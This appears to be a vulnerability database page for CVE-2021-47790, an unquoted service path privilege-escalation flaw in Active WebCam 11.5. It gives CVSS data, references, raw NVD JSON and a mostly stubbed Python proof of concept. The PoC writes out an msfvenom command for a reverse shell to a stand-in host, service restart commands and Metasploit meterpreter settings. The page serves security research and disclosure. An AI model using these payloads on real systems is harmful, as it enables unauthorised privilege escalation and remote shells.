CVE-2021-47790

Description

Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pysoft:active_webcam:11.5:*:*:*:*:*:*:* - VULNERABLE

Active WebCam 11.5及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47790 PoC - Unquoted Service Path Exploitation
# Target: Active WebCam 11.5
# This PoC demonstrates the unquoted service path vulnerability

import os
import subprocess
import shutil

# Step 1: Identify the vulnerable service path
# For Active WebCam, the service path typically looks like:
# C:\Program Files\Active WebCam\bin\Service.exe

vulnerable_path = r"C:\Program Files\Active WebCam\bin\Service.exe"
exploit_dir = r"C:\Program Files"
malicious_exe = os.path.join(exploit_dir, "Program.exe")

# Step 2: Create malicious executable
# In real attack, this would be a reverse shell or meterpreter payload
def create_malicious_exe():
    """
    Create a simple malicious executable that establishes a reverse shell.
    For demonstration purposes, this creates a basic executable.
    """
    # Generate reverse shell payload using msfvenom
    # msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > Program.exe
    
    # Example command to generate the payload:
    payload_cmd = "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o Program.exe"
    
    print(f"[*] Payload generation command: {payload_cmd}")
    print(f"[*] Malicious executable would be saved to: {malicious_exe}")
    
    # Alternative: Use PowerShell for quick exploitation
    # This creates a simple executable using PowerShell
    ps_payload = '''
    $payload = "$env:windir\\System32\\cmd.exe /c calc.exe"
    $exePath = "C:\\Program Files\\Program.exe"
    [System.IO.File]::WriteAllBytes($exePath, [System.Convert]::FromBase64String("..."))
    '''
    print(f"[*] PowerShell payload script available for deployment")

# Step 3: Place malicious executable in the path
def place_malicious_exe():
    """
    Place the malicious executable in the unquoted path location.
    Requires low-privilege access to write to C:\Program Files\
    """
    if os.path.exists(exploit_dir):
        # In real attack: copy malicious executable to exploit_dir
        print(f"[!] Placing malicious executable at: {malicious_exe}")
        # os.system(f"copy malicious.exe {malicious_exe}")
        return True
    return False

# Step 4: Trigger service restart (requires admin privileges or service restart)
def trigger_exploitation():
    """
    Trigger service restart to execute the malicious executable.
    Can be done via:
    - sc stop <service> && sc start <service>
    - system restart
    - Task Scheduler
    """
    service_name = "ActiveWebCam"
    print(f"[*] Service restart command: sc stop {service_name} && sc start {service_name}")
    print(f"[*] Or wait for system reboot")

# Metasploit Framework module usage:
# use exploit/windows/local/service_permissions
# set SESSION <session_id>
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST <attacker_ip>
# set LPORT 4444
# run

if __name__ == "__main__":
    print("=== CVE-2021-47790 Unquoted Service Path PoC ===")
    create_malicious_exe()
    place_malicious_exe()
    trigger_exploitation()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47790
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47790
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47790/
[4] VulDB https://vuldb.com/cve/CVE-2021-47790
[5] https://www.exploit-db.com/exploits/50273
[6] https://www.pysoft.com/
[7] https://www.techspot.com/downloads/175-active-webcam.html
[8] https://www.vulncheck.com/advisories/active-webcam-unquoted-service-path
[9] https://www.exploit-db.com/exploits/50273

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47790", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.640", "lastModified": "2026-01-30T00:59:47.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access."}, {"lang": "es", "value": "Active WebCam 11.5 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio mal configurada al colocar ejecutables maliciosos en ubicaciones de directorio específicas para obtener acceso administrativo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pysoft:active_webcam:11.5:*:*:*:*:*:*:*", "matchCriteriaId": "C1A3DBF5-8958-4809-9DB5-393631788D88"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50273", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.pysoft.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.techspot.com/downloads/175-active-webcam.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/active-webcam-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50273", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}